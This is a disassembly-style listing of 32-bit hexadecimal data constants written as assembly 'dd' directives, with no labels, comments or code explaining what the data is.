dd 6D69347Ch, 0AE51BC16h, 0CE47D464h, 5B235A64h, 6128E299h
dd 34DE6F12h, 5540EBB3h, 2C3E7750h, 5E07F1A8h, 8650DD0Ah
dd 5B098332h, 0E6B8B980h, 0EA6E921Bh, 0EAF7A5D2h, 6E3C07C5h
dd 9C56D7DFh, 6C153452h, 0F86159B6h, 63F18D52h, 0E4E2D944h
dd 0EABEB8D7h, 48D524Fh, 0B5B12CAAh, 0D33E7F92h, 0B6512B95h
dd 0ED7E36F3h, 9F4E4FE9h, 0B459D269h, 0CA33A19Ch, 1EF37CFEh
dd 39422436h, 5D216CDAh, 97709059h, 0E59B451Eh, 56CCCC80h
dd 0E3346776h, 8DC44F81h, 375D3665h, 0E1EE0F15h, 25A0EF46h
dd 4F9E60B4h, 0BED3BB5h, 4D2A78F1h, 510B39DFh, 9DF8F812h
dd 14E6A2DFh, 0E3D6B457h, 4D51190h, 0FF46FE3Ch, 88B78E36h
dd 5962B5F6h, 0ACCC1BDCh, 53DC9487h, 3A241800h, 360D7C19h
dd 17D95D3Ch, 0BBC6CD5Dh, 29694019h, 0A7D63B06h, 0F5F82147h
dd 0B0265F50h, 0C1B82523h, 650539DBh, 81F47DE6h, 7D0F3221h
dd 0F8B36872h, 0B1EA548Dh, 12CB4069h, 0EFD45CA4h, 7591498Ch
dd 24461B8Dh, 995497F4h, 0F18A6EC5h, 82A7C85Eh, 0CAB011CDh
dd 0F3D4322Ah, 2B7D6411h, 51A6ED06h, 5198E884h, 3836023Dh
dd 0FB81741Ah, 0A831B71Fh, 17CEC5B9h, 0B17CA67Bh, 0CDE1692Bh
dd 0B7F10F9Fh, 0CA79B97Bh, 4651237Eh, 5FBBCF7Fh, 0FD6CBB3Ch
dd 76B4C4E3h, 0D28C636Dh, 16506FE2h, 2A934AA3h, 0EE75E1B2h
dd 0AB7B2507h, 0C0DC8EA4h, 0ADEA5DFEh, 26C6ED13h, 51D8FC71h
dd 0A521A4CBh, 0BAF58869h, 6DF54B42h, 7B6F35ABh, 74A961B4h
dd 0FDFDF679h, 30AA8A80h, 2100FD57h, 0AD4A8764h, 0B76FF50Ah
dd 0FC8CE2AAh, 4EFE78A7h, 91BB64BDh, 0BDA5B7A5h, 4C97850Fh
dd 6B260494h, 0C958D85Ch, 0F1DE3FE7h, 0A53A292Fh, 0E45A14B5h
dd 0CC77D2A0h, 800830F6h, 5638D172h, 7120EEABh, 23847E22h
dd 319C6BA1h, 8B1D9901h, 6F6C4A33h, 295F9C3h, 0A4F093AFh
dd 0BC4A9545h, 0E9C37911h, 54DBF8Ah, 0EEA88784h, 42565FE4h
dd 0CAF3D09Dh, 80225DC4h, 0A7E2E65Dh, 42AFDD68h, 36BCC880h
dd 17BECB8Dh, 6AF82AFCh, 3A375DEAh, 0ED7DE5CBh, 0AFAE5957h
dd 0C612A1F8h, 69F99B3h, 0C6114D87h, 87E68355h, 4D141771h
dd 5B14C7E2h, 0C72A11BBh, 0A08FAD81h, 0B82F84E5h, 348EEED9h
dd 0E679FD7Ah, 0DB551F89h, 0AE495DBBh, 48F8D0B0h, 0D4453652h
dd 0B16C0722h, 1267D2D5h, 0A5986F1Ah, 9D19D535h, 459EFA2Fh
dd 12A1621h, 6C4DBD7Ch, 0FA95AB67h, 0BAF5BA18h, 0E5A9A3DDh
dd 398FE255h, 0FBDBC55h, 0A1BDFA6Ah, 0B36DA8CBh, 0D0DF443Ch
dd 71377AEDh, 1837054Dh, 98A72DEEh, 12D55516h, 361BDD95h
dd 8771D556h, 0D1658EF9h, 123A492Fh, 5D897DBFh, 0ACA8D054h
dd 0ECAE2AD5h, 0C3CD4F50h, 8E3407BFh, 7FE0F1A3h, 0BFA4A92Ch
dd 1A8F2693h, 2DAFC77Fh, 0D90D9576h, 0D6D622C2h, 45A7AAB1h
dd 41703B6Bh, 377C0AF5h, 41DB2C39h, 10C98699h, 0C0FDBAD7h
dd 5EF633B6h, 0B29AE4D6h, 0DFE4F577h, 28209FE0h, 0BD6273AEh
dd 69CC692h, 6BE9DDEEh, 1F1A60B8h, 48A8131Ch, 1966F39Bh
dd 0BAE6EEBEh, 1F87BF04h, 70FAAE3Eh, 0F8E70FDBh, 86C872CBh
dd 0A3C89C4Fh, 2D19BFAFh, 5F52D4F7h, 34CC97DEh, 0B3F0337Fh
dd 2B44FD38h, 43A2E47Ch, 9EDCA623h, 0FCD5B8ECh, 129D95C2h
dd 6F327241h, 0D216DE17h, 3E7B5D5Bh, 29D0867h, 0B33A3B83h
dd 31320DE1h, 0DDC54E7h, 0A1AA9045h, 0CECA7F35h, 4F1BFC54h
dd 407CB1D7h, 521FE0E0h, 3E289848h, 0F62FBFBDh, 3FFDBEDEh
dd 296EA745h, 81E74A52h, 71B21E11h, 51FBC8CEh, 2DE2BC12h
dd 6C2E45F7h, 6A7F76CAh, 872B7975h, 69BB95E3h, 0D6F71B64h
dd 3676B991h, 0E4CA7250h, 7937202Eh, 0F2110256h, 0D6954C99h
dd 17FCBDBFh, 27F9CF5Fh, 8D6787E2h, 0DEC37650h, 0D03E8BBCh
dd 0FC9367F8h, 7AD2BE0h, 1FF00836h, 0E811EB0h, 0B4814AFEh
dd 0D4AB8F4Dh, 0B256D7C1h, 390A3BB7h, 0F34BBA9Eh, 9FEDAD47h
dd 7D4EB1EEh, 9572CCB1h, 571BEBC6h, 5838453Ch, 0CD7B6478h
dd 0B968197Eh, 0DBD394C6h
dd 2626DB7Eh, 2C9A4B6Eh, 0FA57547Ch, 13809A55h, 20B6DE57h
dd 0E015963Bh, 0B53AB619h, 3158EE70h, 4477FC1Ch, 9AAE794Bh
dd 319EFB89h, 0E2EBA25Dh, 197D976Ch, 0EA861635h, 6CFEEC60h
dd 0B10176BFh, 581F4F28h, 93CB5738h, 8459C47Bh, 0FB7991BEh
dd 0CC195775h, 8EC51C57h, 8969257Eh, 0DB91888Bh, 6C3A81FAh
dd 976CB25Dh, 8F93F8EFh, 0E497092Fh, 0FF2F3164h, 0C1D7F0E2h
dd 0D77598A1h, 0B86DDFF1h, 96B2691Eh, 56541F40h, 0A0E580ACh
dd 784C9702h, 0AA577E70h, 0BE3F5F1Eh, 0F361427Ah, 57AC6671h
dd 0EAE5A259h, 423DE9EFh, 4E994186h, 6D1DEE74h, 8B81FFA9h
dd 0DAEBB3D2h, 0D5E6C3FDh, 6321BCFCh, 3127AEACh, 0A0BFF848h
dd 0E97443E7h, 1CBFAB0Eh, 4E7AC673h, 55096B95h, 892E15B3h
dd 1A8BC462h, 0FA2E571Eh, 42AF0A1Eh, 0CC45325h, 66086829h
dd 7AB25D96h, 7CE63CAEh, 0A09F4A9Eh, 589B9A50h, 423262ABh
dd 0D3B0E8C9h, 5BEFB8BEh, 0D65F6AC3h, 1B47CD29h, 98A5A64Ah
dd 32955765h, 0A3F56AE9h, 2F3C2F36h, 0D093E1F8h, 6A5EC5C6h
dd 0A1032BD7h, 3BF4B54Fh, 9F5232C6h, 0F4AB449Ch, 0AAB4EED1h
dd 0BCA336ACh, 0D68DD59Fh, 896FE13Eh, 2647D772h, 6AF47067h
dd 874DFB0Eh, 0BAF5B0B2h, 0E45FB8F0h, 33C5A92Ah, 2CB27EE3h
dd 73A7DB4Dh, 4C96357Bh, 0AB790EE6h, 7D64402Ch, 2661CC22h
dd 0BB030AEAh, 64239E2Fh, 0FFA8C6CCh, 80F79442h, 0F4EE9FB3h
dd 0DCE1346h, 839BBE70h, 0B335FB3Bh, 0B3C37F7Dh, 3A4C75A0h
dd 55C37073h, 368D36B5h, 0FBA5EBAAh, 0FA2B5E94h, 0D6FA117Ch
dd 0A831AB3Ah, 3A97E5A0h, 0F0A42D7Eh, 0A501B733h, 6EB45EDEh
dd 1FD647E9h, 6514D756h, 66155396h, 5DC0F47Ah, 0F4C91916h
dd 3724C85Ch, 0FE667EB2h, 0A57C2FF7h, 71F7C8EEh, 0C7797B45h
dd 6F35EEDEh, 0CE95703Fh, 0D05EE333h, 1517BDCFh, 0BA65C395h
dd 0FEFC7DF3h, 96DCA06h, 0B58AEAAEh, 0ABEFD3F2h, 713D95A9h
dd 90B686CAh, 0AFE9E087h, 0DCDEE66Bh, 0CE6F5F27h, 671E7657h
dd 5507E298h, 8A44D8E2h, 4CFD644h, 0B5ECE9D8h, 42917C96h
dd 19957873h, 1E503BA4h, 2D627247h, 0BD28624Ch, 4E831F89h
dd 0CA6FD95Ch, 13943911h, 0DC88D173h, 7165852Bh, 9F17B7Fh
dd 8B7F5724h, 5065A5C5h, 0D1143FBFh, 156025FAh, 52B792D2h
dd 0DE56CD37h, 4468A5C9h, 17CA45DEh, 8161A6DBh, 49A6E093h
dd 6938D952h, 0B53269EEh, 0B426738Bh, 2D7F021Ah, 37146493h
dd 60C0C4C6h, 0F063191Dh, 0DF032E14h, 0ED33E78Eh, 744E5F38h
dd 0CD2B968Bh, 0FBAE925Ch, 0DC3CE741h, 0E357E0E3h, 0BFB0F3Ah
dd 9B6EC9EDh, 90C4A7B0h, 0D871559Ch, 0F5E50FA7h, 6EF3FA6Fh
dd 14175838h, 89A9F9EBh, 0EFA36D26h, 6DD4C659h, 5D6103E7h
dd 5FA41DAFh, 0E0097761h, 6D2B3DA7h, 118D0337h, 0CB845DC7h
dd 0D35CEBDh, 99B4D0B9h, 3D15466Bh, 0D1B9606Eh, 39E3A803h
dd 5F6DDD49h, 0B6C7ED64h, 4D296AC8h, 0B4217729h, 0AF3A2374h
dd 0EFEF78CFh, 6FC57E74h, 9F0FC255h, 64AC0223h, 2DCEC35Ch
dd 55D1C35Dh, 25295A65h, 66AAEE0h, 0AE1F68DCh, 64508D86h
dd 0E6227777h, 9CC1AEF0h, 0C215B9D0h, 0BCFBE34Ch, 44709397h
dd 0F43FC8C3h, 0B8945507h, 0CA4727FBh, 4AC6942Ch, 219698CAh
dd 6B8EB828h, 77A1D8E6h, 17D346DFh, 73A0DB2Dh, 3C4C940Eh
dd 0CAB31D33h, 1B7CFF0Bh, 4BE01B87h, 782E32D3h, 951E87E1h
dd 0FB1FB594h, 0D56D4607h, 52FE8AEAh, 9F562893h, 70D2FC58h
dd 40325D94h, 0A02C9D58h, 10FC37CEh, 0B2A0F4FFh, 0CE9A5C26h
dd 0FC207CCEh, 1641475Fh, 1D10A3D6h, 37500E96h, 0B471945Ah
dd 2428B511h, 97C3D574h, 0F9CB4E0Dh, 0D2FDE1D1h, 7A9F1D06h
dd 0D4B48DD4h, 0AD60FCABh, 6D0F6365h, 0CE36A526h, 0B91BC05Ah
dd 0B35EDA9Ah, 8F38BBD4h, 0FC73F600h, 0C9FADF31h, 2E3A7135h
dd 87E21E8Bh, 7505DDD7h, 96B337EAh, 3DED55C5h, 0C6A4FBB0h
dd 6A6FC33Eh, 73F95174h, 667EF449h, 9681B27Dh, 614D0F6Ch
dd 793D185Ah, 0E12E7FE5h, 5AA749B7h, 0B44E1AA9h, 0F6C7AA9Eh
dd 35A09D78h, 0E7B2C294h, 7E368173h, 1BA69E28h, 1344B904h
dd 238E6AC9h, 75A6E6EEh, 0BBF0CBAFh, 0BB952388h, 15CFAF79h
dd 742C974Bh, 8D61F589h, 8A2D8C75h, 0E66D2AB5h, 81691250h
dd 0FBB62FCDh, 0E9C99CE2h, 0B7CC8D77h, 5858D21h, 4E810FABh
dd 3B50B8BAh, 0DEEE5D56h, 57ABA18Ah, 0CECBB35Eh, 0F87E3968h
dd 0EB6C395Bh, 66FB3EFFh, 2093CCE7h, 85F114A6h, 0D7A597D0h
dd 0DA2DF0EAh, 0C2ADDFCh, 0FB4DBBBDh, 0ED6BBD81h, 142FA066h
dd 5202A630h, 4BD7C8D4h, 0F64F92CFh, 0EB6EBA3Bh, 0BE0E71F7h
dd 0ACC77F1h, 0F43BA5E4h, 0BA5FE07Ch, 264B0532h, 416AEFC4h
dd 0A7FEECD7h, 0DFE35A7Fh, 0D29E255Bh, 29A50BE1h, 5F52D8Bh
dd 0A7794F2Eh, 0CCD26A2Ah, 0B0CC4528h, 7B71B712h, 397C31F0h
dd 2D6A457Fh, 0C4AFF75h, 0A9B2FF71h, 0AF9CC318h, 8CF6507Ch
dd 3F524747h, 642EC433h, 7752FEBFh, 0ACA1939Eh, 7330C5C9h
dd 6A1A556Dh, 74E99806h, 0CE7DC548h, 0C1AD0A94h, 0B9429D2Fh
dd 371BD1A3h, 561AFC99h, 887D214Eh, 0E04AA298h, 90E06576h
dd 7F207A1h, 0B4B0A42Fh, 510BA9AFh, 0F6AD8770h, 0E27FB4B5h
dd 35E673A5h, 0ED7B4042h, 0E6FA658h, 1D59A6BAh, 4D19EE47h
dd 59E814A9h, 723937Ch, 0E6D96318h, 0BBEEE232h, 5AA3D2Ah
dd 613E9DFFh, 0B7FDC0FBh, 6E21BB6Ah, 0EDE2754Ch, 0D65B5A4Dh
dd 570FA568h, 6E2F6BC7h, 0F2B190FDh, 0FF38322Fh, 401E9DABh
dd 3E8E3C28h, 9BED4120h, 0C6CCEBFh, 0F6896941h, 519C9FB1h
dd 7B1CE07Ch, 216979F8h, 18EAA6FAh, 598BD947h, 39F94CBCh
dd 0F3A1A37Fh, 3BC64D1Fh, 0BA9A3E35h, 3252CF94h, 0DCC9E4C7h
dd 4B6957E7h, 0B87E5517h, 745D3E93h, 4B460361h, 4E5AD075h
dd 8DF4D1D7h, 57468766h, 1DA37DE0h, 0D3BAAEBFh, 94BA29ECh
dd 0DA62329Fh, 0D90853FFh, 714487E1h, 0ECC77E33h, 0F97A67DEh
dd 0D9CEE633h, 3365529Ch, 0F85C479Bh, 4B3BD297h, 0D4CAAE1Ch
dd 131BEE67h, 0E7BA9D27h, 5BA07618h, 7CDBD04Ah, 0F54287E2h
dd 0C952B0C1h, 2AFE6A5Ah, 3273590Fh, 94929C43h, 4DDB1DA2h
dd 4B8DE414h, 32491D4Eh, 6C80E45Ch, 0EE70BAA6h, 0C2D17394h
dd 6FA45F30h, 99EDC8F5h, 6DCCCFCEh, 0E391D6E6h, 5C5FC49Dh
dd 0AE5F0D1Ah, 82F2D2FCh, 0C6B3BA06h, 0C968B282h, 3AFB2F8Dh
dd 4A46A3D7h, 0FAF13AFBh, 0BA98D751h, 0B9AD2AFCh, 917FCD25h
dd 6C867B09h, 54EFFA01h, 0C1C8F1D4h, 0D5A22EE9h, 42DE02D7h
dd 8DA31682h, 0A271522Bh, 0B832ECFAh, 0DF447D8h, 0F919192Eh
dd 8E234A3Eh, 1D625517h, 171F977Ch, 5FA46C2Bh, 5063E741h
dd 0FBFBA5Dh, 0D2E1793Eh, 9B8C505Dh, 0DBF13532h, 1530070Dh
dd 932D8EF6h, 9EFAE268h, 4A77473Eh, 5D6A1ABCh, 1DB11752h
dd 1879DA3h, 0C48BE8AEh, 0F8EC0FF1h, 0DD57480Bh, 672AF6A9h
dd 3EFC8275h, 0F3AEE8E3h, 0D6D62902h, 4952D1E7h, 0CB06EB6Ch
dd 653AAABh, 9769E6C9h, 0C6BC0EECh, 71FC3A2Fh, 7FC7E76Fh
dd 0F6754C19h, 2D1329AAh, 0D14EC293h, 5C6517D2h, 4FCC0765h
dd 0B82A1287h, 6A1EC98h, 81AB98BCh, 3AC97546h, 4E862079h
dd 317CFFBBh, 2D14C5CFh, 65CD995Bh, 0E314FC30h, 0EDABB926h
dd 60DE0815h, 0C634123Fh, 87CC6699h, 3AEB7ACDh, 0FD220C2Eh
dd 0F8F58284h, 88CACD4Ch, 1E8FF64Dh, 6FE7AC45h, 590F247Eh
dd 1D7F5F49h, 6562D9FCh
dd 7C96F82Eh, 79062EE6h, 68D0B398h, 0F73AA963h, 3EA5E9BAh
dd 0E520C3BDh, 0C0F74DF5h, 986D6480h, 686EBD76h, 0F94CE80Bh
dd 549A4155h, 0E3485AF3h, 2AAA640Eh, 39FDCA60h, 99576F8Fh
dd 3594BC4Bh, 56096554h, 2B6C177Bh, 235A61E9h, 0CAD5EE13h
dd 0D62578ABh, 6ECF5558h, 715F244h, 0FFF8095Fh, 6310A631h
dd 0EDAC2993h, 5317B1EFh, 0B94D651Ch, 0B915A946h, 3E1B3287h
dd 8D668571h, 0B8CBC38Ch, 0DDFD8BEDh, 2FA701F3h, 6F8E86E1h
dd 0D5E6CB0Ah, 0F39DD202h, 4AD1CCC5h, 492A4E7Eh, 990614B1h
dd 32A5CA92h, 1DFC87C3h, 61FFD77h, 0D6FCE33Ch, 96A6DA4Fh
dd 65571E3Dh, 0F466EC5Dh, 8DD338D4h, 7129605Ch, 0A233FA60h
dd 8C629CC9h, 3D75DF60h, 0E980D97Dh, 0CF3A5B8Ah, 9CEC1847h
dd 0A267B5F3h, 5D986CE5h, 0D9F64D9Ah, 0C635BE4Eh, 83CB2A8Fh
dd 0F5C788B3h, 0AB0C8494h, 9E56B03Dh, 68454A7h, 1E04AE8Ch
dd 4FD06398h, 53BE8318h, 1B965A10h, 9D9FC759h, 17D1B7E6h
dd 0D4669F0Fh, 7631B461h, 0DFA9D094h, 8B4881F9h, 27D3B2D9h
dd 66DBA62Bh, 0C0292EB0h, 3AE0326Eh, 890D3A89h, 0DAC8ED6h
dd 0C4543B81h, 275A2BBDh, 0F67C8D48h, 0D1E03959h, 781F1B4Fh
dd 0E76AF1A1h, 0AD6BF7A0h, 0FDAD5B2Fh, 61765576h, 13456076h
dd 0F8F8CA82h, 259C356Bh, 33E71C0Ch, 0E89F1234h, 4DCB644Ch
dd 7F18F953h, 0E664738Ch, 5D636CC7h, 3491E435h, 0E87B7D56h
dd 44E79902h, 7C774135h, 5AA67761h, 0AAB53774h, 76AB3871h
dd 676AA54Eh, 3639C56Ah, 0DFBF1DF8h, 0D092AE73h, 8B978F49h
dd 0F57D6A22h, 9FAB5538h, 4128F81Dh, 7146AB36h, 0DBFB54DDh
dd 0C53E39C8h, 0AABA2BCCh, 722CA113h, 35B5E5D3h, 19B82F39h
dd 93A66A61h, 74B4215Fh, 0CA7155AFh, 8B285EB9h, 0C3B169FCh
dd 0F8B50F36h, 0AE4D68E7h, 696D78A6h, 0D8F8C6F6h, 0D7AE5568h
dd 15CD44EEh, 248F7A84h, 26B5C465h, 722E83Ah, 23B08C72h
dd 4A4A6E79h, 1241479Eh, 0B1CEABCFh, 2194A52Bh, 0E5AE7E15h
dd 12EC3DDDh, 8D12E7CFh, 769BD614h, 320393C2h, 0AFE4C682h
dd 0C396AB81h, 368B8F34h, 0DF7F1C12h, 44A3C8AEh, 17684A55h
dd 15920E6Ch, 9966EC9Bh, 303CCC1Dh, 0B3B1E060h, 0EA98ABC6h
dd 0FB079F2Fh, 0A2F547A1h, 0DD515DA9h, 0AC3F29E8h, 0DF27B7D4h
dd 0D20F6617h, 99CAF25Fh, 3DC50FE1h, 8CF43BD7h, 71FD6C58h
dd 95710E70h, 62A1BA1Fh, 0EE77346Bh, 0A804E08Bh, 2616CA7Fh
dd 0A66FF02Dh, 3F07937Ah, 0B59CC8BCh, 1A4C97E5h, 6E9B7963h
dd 0AD5BC3A9h, 3026681Ch, 8DA219A6h, 0E1FF51CAh, 92EB7FC0h
dd 0E1CB15B3h, 7F9F0CC9h, 0BF86FA6Dh, 0F23F5E38h, 8BF6756Eh
dd 659114B4h, 9346569Ah, 64CC0399h, 35B62F25h, 894E8E5Ah
dd 7D469771h, 43ADFE71h, 259EBE7Dh, 68F24BBCh, 50967B39h
dd 8DF3460Eh, 0E8B6790Fh, 0E047AF4Fh, 0A4E2616Dh, 0C6E6C2A5h
dd 0CB7A65D8h, 0DCF31FB4h, 0D6572899h, 8F6E230Dh, 0BE4A052Ah
dd 5A357041h, 4556AC7Dh, 9283563Eh, 0DFDF6227h, 6B87212h
dd 79CB148Eh, 0BEEBCED9h, 84EC4AE4h, 6A0C4099h, 0D9FB6DB2h
dd 3C09FDEAh, 13235258h, 31D82F74h, 702B28A8h, 0F66745ADh
dd 52C4EC8Dh, 5A001BBDh, 1BB3C89Dh, 84B13A12h, 0F9699165h
dd 2A5A1CEAh, 47CCF9FAh, 4C2F4F0Fh, 469B2C26h, 0EDCCA5Dh
dd 3FF4C87Fh, 56B2046Bh, 3F0FB053h, 0A7742EC4h, 58DE1557h
dd 0D8B3A750h, 0B59127BEh, 4DF7C3D5h, 8E9DBA2Bh, 0D74DAFA3h
dd 2EB973D8h, 0F91FCC8Ch, 0C7C884D9h, 3CD80D57h, 0E884AB5Ah
dd 18491F7Ah, 4660EFAh, 0BBB7C9CCh, 79503F6h, 0C6DD7B8Bh
dd 5360D44h, 0EF5877DAh, 85550FF8h, 979D391Ch, 0A53E6C97h
dd 6C8961F5h, 92C80958h, 8BB9D678h, 0EA06E094h, 0B09060Bh
dd 0FCEE4CA2h, 0C0B98E8Eh, 0D4ED04A8h, 0A9F7A78Dh, 0CD5A152Bh
dd 2E71E7B2h, 99AED8C5h, 0D3C0BFDDh, 0E4A95AD3h, 0E46D52DDh
dd 0B3CA6BCh, 289D6708h, 0D555633h, 3893BAD7h, 91771B95h
dd 6993CF5h, 97B2E2BEh, 0B5E4F43Dh, 894B2367h, 5DF78BFEh
dd 1B19E6CEh, 428D470Eh, 0E07D1ABBh, 8D4A4C9Fh, 0B21DB1AFh
dd 0AEAC80EFh, 0B6E35A3Eh, 0F3D04AA4h, 0DE9FC35Dh, 83BD63B6h
dd 9AEA41A7h, 0AE43D625h, 0A74E256Ah, 94B3F105h, 6D135F09h
dd 3FBAA26Dh, 0B19D0C57h, 65F9DC91h, 0B44649EBh, 419C18B9h
dd 320A58C5h, 983D8546h, 7AAA7E0h, 3ACD9B33h, 0A8DA1C7Ah
dd 1AAE0915h, 0B43F229Ah, 0A02FAD65h, 7AA67A67h, 0DC4CF1E9h
dd 802F2D8Dh, 0AF359AB5h, 420A328Dh, 0B8B7C1F7h, 0C6FD7961h
dd 0A1F86736h, 7D8A0C46h, 7DD5FD4Fh, 0B85846FBh, 0B012716Eh
dd 0F051BF63h, 894F9BC7h, 0FC86B67h, 0E0F76517h, 18E59503h
dd 57B6C9Ch, 0EF2A138Dh, 0A52F2115h, 0EB195979h, 0D4F30029h
dd 46F54FCFh, 47B7C00Eh, 70A779CBh, 3E97AAD2h, 1B48D67Bh
dd 0BED3DFAAh, 0BF585D23h, 63831A58h, 0B4FBBF85h, 1F27C664h
dd 0BB5943B4h, 0EA6CB0EAh, 5635573h, 102FE10h, 13259A85h
dd 0F0A19E61h, 7D7554AEh, 0AA870AB4h, 77A6DF61h, 5D19E26Ch
dd 1900E747h, 0E214D523h, 0DF1BA7E7h, 0DDD7EB67h, 7BF49CCBh
dd 324CBE14h, 0AB3EA2FCh, 822F979Ch, 473DCEDFh, 0FE28C2B3h
dd 2979B7D2h, 6960FDFEh, 8CE72FEAh, 41B4B793h, 9EE954C2h
dd 67A1CBAFh, 5489F0B8h, 0C5919AB6h, 64E38447h, 0ACCE772Ah
dd 0AE0F6085h, 67454EBEh, 35FE4994h, 0A0C12C16h, 0D0277E20h
dd 6C055DA1h, 0D55EFC30h, 56496E86h, 0ECEE39F9h, 1CFF8517h
dd 2B457230h, 0A2B07DD5h, 98C73B74h, 6D1F9DA1h, 0A968CEF0h
dd 59FC35C2h, 99C7F86Bh, 0AAB56CB7h, 0FAF1C525h, 633B7C7Dh
dd 0D7D41A54h, 0D39413E7h, 4E73E95Ah, 0E97879B7h, 0AC1BFB65h
dd 0E7AEF6D7h, 52EF8CCFh, 9F87BD51h, 0AF8C042Fh, 0F3EB9D0Bh
dd 59B7CE07h, 0EE1FF8E8h, 32314E5Ch, 0F5B82A6h, 0F32346F9h
dd 7F771DB2h, 51645FF8h, 0D6997F00h, 6A8F9299h, 0E2B47038h
dd 6D40B10Bh, 22DBB252h, 0FD8BFF70h, 0E6E11AD6h, 0A8913A84h
dd 9222B3A6h, 0D4FA36E6h, 0C9911EA5h, 0C8A6127Ch, 0F4D6CDAEh
dd 7E9CF657h, 161B1079h, 0BD92BB44h, 113BF0A6h, 0AA970B8Eh
dd 0BDF9D899h, 84D3354Eh, 6BBB314Bh, 0B6F17EAEh, 6F6E52F8h
dd 85429B0Dh, 0F8A936E4h, 0D31E7E8Ah, 42CCDA68h, 0FCEEA85Bh
dd 0FE5F9991h, 10ABF245h, 6F658A8Ch, 0DA3C3325h, 0F1FA1CAEh
dd 2FDE1265h, 88BF48DCh, 0D085AA6Ch, 86944652h, 8B8B4F90h
dd 5B79F3Fh, 3336F07Dh, 3FDC3D99h, 18D79606h, 79D37491h
dd 0E048A3A7h, 0D1914D98h, 0A3AAE546h, 0EBBD67B8h, 323A5EC7h
dd 9CB663D0h, 75944B7Fh, 1257E0EFh, 0E5523DA1h, 1EFD15DBh
dd 46A20E49h, 6CB40B44h, 742ECC13h, 9FC33C1Fh, 823BBE75h
dd 0EFECCD73h, 8CCB7FD6h, 3689DFEDh, 4B357123h, 57D95F25h
dd 0FD7F3B75h, 49D6B23Bh, 1FA1383h, 0CDCDA972h, 33BBABA5h
dd 0E5D459FAh, 0D9819FE9h, 28B304D2h, 0EA16E2ECh, 9F0F9A8Bh
dd 95F2947Fh, 0EAE6C6DCh, 0B018744Dh, 7A1AF346h, 257F579Eh
dd 0B9F1CD39h, 0CB6B4DF5h, 1CBB457Ch, 7530457Eh, 0D52488F2h
dd 5E553E3Fh, 0F99A9639h, 4BD8DD6h, 1D1B136Fh, 0DC6941D6h
dd 37D669AFh, 0D8A99F6h, 0F05F8ADCh, 0EFD1B6FCh, 0C5F2A943h
dd 2FF81FC9h, 93EE70Eh, 0C6CDCB43h, 6679D309h, 2AB8AF91h
dd 541A1D0Fh, 8705B9FBh, 39BE7AABh, 0D2EB0F2h, 5A2E0FF7h
dd 0D69EE3E4h, 0FF8F32C7h
dd 99BA539Eh, 0E11D562Fh, 71779E1h, 3A9165A7h, 117C7974h
dd 207D75A4h, 8756E553h, 0D348ABD4h, 0CA38DFACh, 0DD8EBB87h
dd 0E51AEA66h, 0D9A44CD0h, 8B9B2734h, 5AB5425Ch, 0A56112A4h
dd 202733ABh, 7D15D7BAh, 0FE6C4911h, 35413EFEh, 9BFC768Fh
dd 4E7F9DF6h, 0C2F361F8h, 0FD457D68h, 0BBE44C65h, 6B4E6404h
dd 99708BE3h, 845EEA21h, 98EBC632h, 293595Ah, 177F2565h
dd 683A33E6h, 42B7ADA8h, 0D2CAF4D4h, 0CF93AD31h, 0FA2BA6F0h
dd 0D5DA25EFh, 811B4A16h, 9657926Fh, 83A54520h, 0F7E450FEh
dd 0FC83E8B2h, 0F635FE32h, 0C4DA567Ah, 0C86E4CD2h, 249121F9h
dd 0F0420D42h, 0A1FAD8FBh, 83C7FE7Fh, 0A5D18E33h, 0E2D4721Fh
dd 0FCDD2386h, 340C450Dh, 0D1F8476Eh, 0D9D66D4Eh, 57AC27E7h
dd 0FAF8D553h, 0F9A701Bh, 25A21398h, 6511A968h, 0F72FB317h
dd 10DBB39Ah, 0F889331Fh, 0C6F561E1h, 0D3AB8AEBh, 450A2A74h
dd 0A948ED31h, 0D90D6BAEh, 0A687B03Fh, 0CBA21662h, 29685C7Dh
dd 3D568F1Bh, 8D59F272h, 0D7736235h, 0BAB8AE16h, 1E96B2CEh
dd 17738A34h, 0FD2B1230h, 54FE328h, 9A8546F6h, 926986AAh
dd 0DA729FC5h, 35D3D0A5h, 0B174DBE4h, 7146090Dh, 2B244E1Bh
dd 5D40D18Ch, 78E0059Dh, 7E2A648Ch, 0B1A57EB8h, 7C3B2AAEh
dd 0B1707EF4h, 6ED144F2h, 0C5A5A42Ah, 38C0AFBEh, 0BE202277h
dd 25C07758h, 0FE36999Ah, 26BD327Ah, 9578548Bh, 4111E2F9h
dd 43F0F83Dh, 3872DDBBh, 0E62A77CFh, 57DE6755h, 4F1BD168h
dd 7135833Bh, 8BA977EDh, 8A843BD5h, 15ABD630h, 2A825DC8h
dd 0CCB5B707h, 0F6BD135h, 0BB3C1C98h, 0E8513227h, 0A6E83EFCh
dd 41E7CC5Eh, 9BA5E28Bh, 8F1C909Fh, 0F4C30DD6h, 0CEF18EB4h
dd 0B3EF702Ah, 0ECF9AD67h, 58E3992Dh, 66493521h, 30D8235Eh
dd 4B19E0ADh, 0D9FA1E90h, 0CE7C5C2Ch, 7735EFD5h, 0C83993E3h
dd 0E119C64Bh, 0A615BAFAh, 4A8D5A7Fh, 0D2D4F334h, 27B8A2C3h
dd 862364ABh, 940D3CBAh, 150BE058h, 0ABB6CE01h, 0A0FBEB98h
dd 0EF49B05Dh, 5A3A8DDFh, 0E3BB05A9h, 309BD54Dh, 35F79E91h
dd 0DBF702F4h, 0E25FB76Ah, 6F9BEB2Eh, 0C1D06629h, 0B2A2C4C7h
dd 0EC65EB3Eh, 0C587866Fh, 0F82F3782h, 0CBEC8144h, 7AFF2B89h
dd 9215B619h, 0DC62AACFh, 0A288ACABh, 0DFD19819h, 0B1EA536Bh
dd 0C125B47Bh, 0C9C777CEh, 81DB81B5h, 0CB980E56h, 7CDE6867h
dd 86BAAF60h, 30A15D5Eh, 0C5F9C8A9h, 0E72D4562h, 1085D57Ah
dd 3F097FE7h, 1D39DA2Eh, 3DDB5408h, 2BE7D37Eh, 0B0E94286h
dd 83CE8556h, 0FD1DEDC7h, 79F2844Ch, 0FE002CFFh, 0C3208F1Dh
dd 5A0351DDh, 0EFFBEED8h, 0A8F00C62h, 7EB5E912h, 994EC4AFh
dd 2B0553Fh, 9EE8DE03h, 4973FC04h, 39B6AB90h, 4E28942Dh
dd 405E7953h, 0DB479C01h, 2B94E3AEh, 979967DEh, 6AE1E9F7h
dd 0CD3F5AA4h, 0A85A6E68h, 0A151D6DFh, 0B4C86C77h, 6CBE13F7h
dd 7D50694Ah, 698FC862h, 9BA2377h, 765777BDh, 3D830CE6h
dd 9484DEAh, 5CBB506Eh, 0C6BA19FFh, 57DF7B2Fh, 0CA17C657h
